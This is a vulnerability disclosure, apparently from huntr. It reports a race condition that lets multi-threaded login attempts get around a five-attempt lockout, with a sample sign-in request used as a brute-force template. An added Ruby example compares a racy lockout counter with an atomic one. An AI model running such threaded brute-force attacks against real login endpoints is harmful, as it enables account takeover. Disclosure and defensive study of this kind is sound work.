huntr / dievus / 1B5BF096-FC67-42EB-A556-8FC2B3FE9233
History: Jun 27, 2022 - 12:33 p.m.

Threaded Race Condition in Authentication Allows Bypass of Authentication Attempt Restrictions

2022-06-27 12:33:57
dievus
www.huntr.dev

EPSS: 0.002 (Low)
EPSS percentile: 58.3%

Description

A race condition exists in how the application handles concurrent authentication attempts. The application recognizes and protects against single-threaded attempts with a five-attempt lockout. By increasing the number of threads in an authentication brute-force attack it is possible to multiply the number of allowed attempts before a lockout occurs. The tester was able to increase attempts by a factor of 40 (5 attempts times 40 threads). Results with other thread counts were inconsistent, but in one test scenario the tester found a valid authentication at attempt number 499 (the highest observed).

CVSS - AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Proof of Concept

Authentication brute-force PoC - the request used as the Burp Intruder payload:

POST /api/v1/signin HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/
Content-Type: application/json
X-Requested-With: XMLHttpRequest
X-CSRF-Token: jA18mk7hOGTpj+qgmFfs0z7Mx/EtYoeliFT9nphfSQ44r7+ETthl4fJMvNnp7HQeMYYYXd5Ws34mSdltjpvRtg==
Content-Length: 88
Origin: http://localhost:8080
DNT: 1
Connection: close
Cookie: _zammad_session_a138cfd0f37=d7a577940ea805561fe5f8ad93998bd3
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"username":"[email protected]","password":"PassworD123!","fingerprint":"-781305443"}
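The lockout race described above, as an added example that is not from this report or from Zammad: a check-then-act limiter that lets every concurrent request through, beside a reserve-then-check limiter that holds at five, both driven by 40 simultaneous attempts the way a multi-threaded Intruder run is. The class names, the in-memory counter and the Mutex are assumptions for a single-process demo.

```ruby
# Added illustration, not code from the huntr report or from Zammad.
# Check-then-act: read the counter, run the slow password check, record the
# failure afterwards. Concurrent requests all read the same stale count.
class RacyLoginLimiter
  MAX_ATTEMPTS = 5
  def initialize
    @failures = Hash.new(0)
  end

  def attempt(username, delay: 0.0)
    return :locked if @failures[username] >= MAX_ATTEMPTS  # read
    sleep(delay)                # simulated password check / DB round trip
    @failures[username] += 1    # write, after every racer has passed the read
    :allowed
  end
end

# Reserve-then-check: increment and compare as one atomic step before any slow
# work, so at most MAX_ATTEMPTS requests ever pass the gate, however many arrive
# at once. A Mutex covers one process only; across processes the shared store
# must supply the atomicity (an atomic UPDATE ... RETURNING, Redis INCR, etc.).
class SafeLoginLimiter
  MAX_ATTEMPTS = 5
  def initialize
    @failures = Hash.new(0)
    @lock = Mutex.new
  end

  def attempt(username, delay: 0.0)
    count = @lock.synchronize { @failures[username] += 1 }
    return :locked if count > MAX_ATTEMPTS
    sleep(delay)
    :allowed
  end
end

# Fire `threads` attempts against one account simultaneously, as a
# multi-threaded Intruder run does, and count how many got through.
def run_concurrent(limiter, threads:, delay:)
  results = Array.new(threads)
  threads.times.map { |i|
    Thread.new { results[i] = limiter.attempt("victim", delay: delay) }
  }.each(&:join)
  results.count(:allowed)
end
if $PROGRAM_NAME == __FILE__
  puts "racy: #{run_concurrent(RacyLoginLimiter.new, threads: 40, delay: 0.2)}/40 allowed"
  puts "safe: #{run_concurrent(SafeLoginLimiter.new, threads: 40, delay: 0.2)}/40 allowed"
end
```

The sleep stands in for the password hash check that, in the real application, sits between reading the failure count and writing it back; the wider that window, the more racers fit through it.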

